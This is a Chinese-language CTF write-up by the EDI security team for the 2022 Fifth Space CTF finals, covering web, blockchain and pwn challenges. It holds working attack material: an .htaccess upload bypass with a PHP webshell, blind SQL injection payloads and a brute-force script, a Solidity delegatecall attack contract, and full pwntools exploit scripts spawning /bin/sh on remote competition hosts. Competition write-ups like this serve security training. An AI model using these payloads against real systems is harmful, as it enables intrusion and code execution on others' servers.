EDI
JOIN US ▶▶▶
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。
欢迎各位师傅加入EDI,大家一起打CTF,一起进步。
(诚招re crypto pwn misc方向的师傅)有意向的师傅请联系邮箱root@edisec.net、shiyi@edisec.net(带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。
点击蓝字 · 关注我们
1
codereview
此题有附件,发现其upload⽬录下有写好的phar.jpg 直接找到反序列化点进⾏利⽤便可。
分析下所用一句话木马口令
2
esayupload
前端代码里有hint
双写绕过
访问此路径,文件上传,上传.htaccess
AddType application/x-httpd-php .jpg
然后上传.jpg 马。对文件内容检测,发现
disable_funcpcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld
蚁剑插件
3
easysqli
布尔盲注 过滤
2'%26%26(ord(substr((select(group_concat(table_name))from(sys.schema_table_statistics_with_buffer)where(table_schema)like'web2') %26%26'1
无列名注入flag表
脚本:
import requestsimport datetimeproxies = {"http":"127.0.0.1:8080","https":None}if __name__=='__main__':# 在此更改攻击urlurl="http://39.107.82.142:34754/index.php?id="str1='!#()-.0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz{}'tmp=""while True:for i in range(0,len(str1)):sql="2'%26%26((select*from(users)limit/**/1)<(select/**/'administrator',binary'{}'))%26%26'1".format(tmp+str1[i])sql_url=url+sqlr=requests.get(sql_url,proxies=proxies)if 'alice' in r.text:tmp=tmp+str1[i-1]print(tmp)break
再注users表,猜一下列名直接跑
登录替换user-agent和Accept,出flag
1
Can_you_be_rich
nc 看到题⽬合约源码
// SPDX-License-Identifier: UNLICENSEDpragma solidity 0.8.0;import "@openzeppelin/contracts/token/ERC20/ERC20.sol";import "@openzeppelin/contracts/access/Ownable.sol";contract CTFToken is ERC20,Ownable {bool airdropped;constructor() ERC20("CTFToken", "CTF") {_mint(address(msg.sender), 100000000000);}function airdrop(uint num) public onlyOwner {require(!airdropped, "Already airdropped");airdropped = true;_mint(msg.sender, num);}}contract Vuln {CTFToken public token;bool solved;constructor() public {token=new CTFToken();}function set(address _contract) public {(bool success, bytes memory data) = _contract.delegatecall(abi.encodeWithSignature("set()"));require(success, "delegatecall failed");require(!solved, "");}function solve() public{require(token.balanceOf(msg.sender)>=100000000000);solved=true;}function isSolved() public view returns(bool){return solved;}}
可以利用Vuln合约的set()中的.delegatecall()调用攻击合约 修改余额大于100000000000即可
给了rpc 和水龙头,小狐狸连上
水龙头给当前地址转钱,可以多转点
终端交互
deployer account: 0xccBB26F75bb7F634c595c8A5C1A351f6be837f9D
给这个账户转钱
可得到contract address部署合约地址
先部署token1,然后拿到合约地址
把attck里面的token地址修改为token1的合约地址部署attck
contract token1{function balanceOf(address _address) public view returns(uint256){return 900000000009;}}contract attck{address public token;function set() public{token=0x792d61a0A3AfE70aE16A72FA98c94213C13f647f;}}
然后用Vuln合约的set()调用attck
此时已可以获取flag了
1
takeeasy
#coding:utf-8from pwn import *context.log_level='debug'elfelf='./pwn'elf=ELF(elfelf)context.arch=elf.archgdb_text=''''''if len(sys.argv)==1 :io=process(elfelf)gdb_open=1libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]elif sys.argv[1]=='2' :io=process(elfelf)gdb_open=0libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :io=remote('39.107.68.43',42324)gdb_open=0libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def gdb_attach(io,a):if gdb_open==1 :gdb.attach(io,a)# io.recv()pay='a'*0x18+p64(0x4011FF)+p64(0x401176)io.sendline(pay)# libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-88-0x10# libc.address=libc_base# bin_sh_addr=libc.search('/bin/shx00').next()# system_addr=libc.sym['system']# free_hook_addr=libc.sym['__free_hook']# success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))gdb_attach(io,gdb_text)io.interactive()
2
easyfp
#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./pwn'#context.arch='amd64'while True :# try :elf=ELF(elfelf)context.arch=elf.archgdb_text='''b fputs'''if len(sys.argv)==1 :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.31.so')io=process(elfelf)gdb_open=1# io=process(['./'],env={'LD_PRELOAD':'./'})clibc.srand(clibc.time(0))libc=ELF('/lib/x86_64-linux-gnu/libc-2.31.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.31.so')io=remote('39.106.154.197',29493)gdb_open=0clibc.srand(clibc.time(0))libc=ELF('./libc.so.6')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def gdb_attach(io,a):if gdb_open==1 :gdb.attach(io,a)def choice(a):io.sendlineafter('>> ',str(a))def add(a):choice(1)io.sendafter('Name:n',a)def edit(a):choice(3)io.sendafter('n',a)def show(a):choice(4)io.sendafter('n',a)def delete(a):choice(2)io.sendafter('Name:n',a)for i in range(7):edit('k'*0xe0)show('n')add('aaa')edit('k'*0xe0)show('n')add('aaa')add('bbb')delete('aaa')edit('k'*0xe0)add('a'*0x68)stderr=0xc0for i in range(0x10):delete('a'*0x68+'xc0'+p8(0x5+i*0x10))kk=io.recvuntil('add')if 'Not found' in kk :continueelse :stderr+=((0x5+i*0x10)<<8)breakadd('a'*0x68)for i in range(0x100):delete('a'*0x68+p16(stderr)+p8(i))kk=io.recvuntil('add')if 'Not found' in kk :continueelse :stderr+=(i<<0x10)breakadd('a'*0x68)for i in range(0x100):delete('a'*0x68+p64(stderr)[:3]+p8(i))kk=io.recvuntil('add')if 'Not found' in kk :continueelse :stderr+=(i<<0x18)breakadd('a'*0x68)for i in range(0x100):delete('a'*0x68+p64(stderr)[:4]+p8(i))kk=io.recvuntil('add')if 'Not found' in kk :continueelse :stderr+=(i<<0x20)breakstderr+=(0x7f<<0x28)libc_base=stderr-libc.sym['_IO_2_1_stderr_']libc.address=libc_basebin_sh_addr=libc.search('/bin/shx00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']add('x00'*0x68)show('n')edit('k'*0xe0)show('n')edit('k'*0xe0)show('n')add(p64(free_hook_addr))add('/bin/shx00')add(p64(system_addr))delete('/bin/shx00')# success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))gdb_attach(io,gdb_text)io.interactive()# except Exception as e:# io.close()# continue# else:# continue
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
原文始发于微信公众号(EDI安全):2022第五空间CTF决赛WriteUp By EDISEC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论